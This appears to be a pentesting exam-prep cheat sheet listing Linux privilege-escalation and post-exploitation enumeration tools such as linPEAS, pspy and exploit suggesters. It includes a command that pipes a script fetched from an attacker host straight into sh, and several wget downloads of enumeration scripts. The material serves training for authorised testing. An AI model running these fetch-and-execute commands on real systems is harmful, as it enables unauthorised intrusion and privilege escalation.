Linux post exploitation scripts
I personally use linpeas (https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS) as it's well maintained and frequently updated for latest bugs and patches
Words of wisdom
Be careful with what scripts you are executing as auto exploitation is totally restricted in exam and you are going to fail if you done this mistake , even without your intention so ALWAYS first check what you running before executing it , (Must give attention to 'auto-exploitation' word in scripts)
Execution of script
wget http://<Attacker_IP>/<script_name> | sh | tee output.txt
# This will pull file from attacker box and execute it and also store output to txt file
Common Location with writable permissions to download and execute scripts
/tmp
/dev/shm
bangenum.sh (initial linux enumeration)
wget https://raw.githubusercontent.com/bngr/OSCP-Scripts/master/bangenum.sh
sed -i -e 's/\r$//' bangenum.sh
./bangenum.sh
PSPY
What is running, any cron jobs any scripts? Use PSPY to find out
https://github.com/DominicBreuker/pspy
linux-smart-enumeration
https://github.com/diego-treitos/linux-smart-enumeration
SUID search
https://github.com/Anon-Exploiter/SUID3NUM
xploit_installer.py (exploit suggester)
wget https://raw.githubusercontent.com/wwong99/pentest-notes/master/scripts/xploit_installer.py
USAGE: xploit_installer.py <exploit id>
Unix Priv checker
wget https://raw.githubusercontent.com/pentestmonkey/unix-privesc-check/master/upc.sh
linux-local-enum.sh
wget https://raw.githubusercontent.com/Arr0way/linux-local-enumeration-script/master/linux-local-enum.sh
linuxprivchecker.py
wget https://raw.githubusercontent.com/sleventyeleven/linuxprivchecker/master/linuxprivchecker.py
linux-exploit-suggestor.sh
wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh
unix-privesc-check.sh
wget https://raw.githubusercontent.com/pentestmonkey/unix-privesc-check/master/upc.sh
KernelPop
Automated kernel vulnerability enumeration and exploitation
https://github.com/spencerdodd/kernelpop
Last updated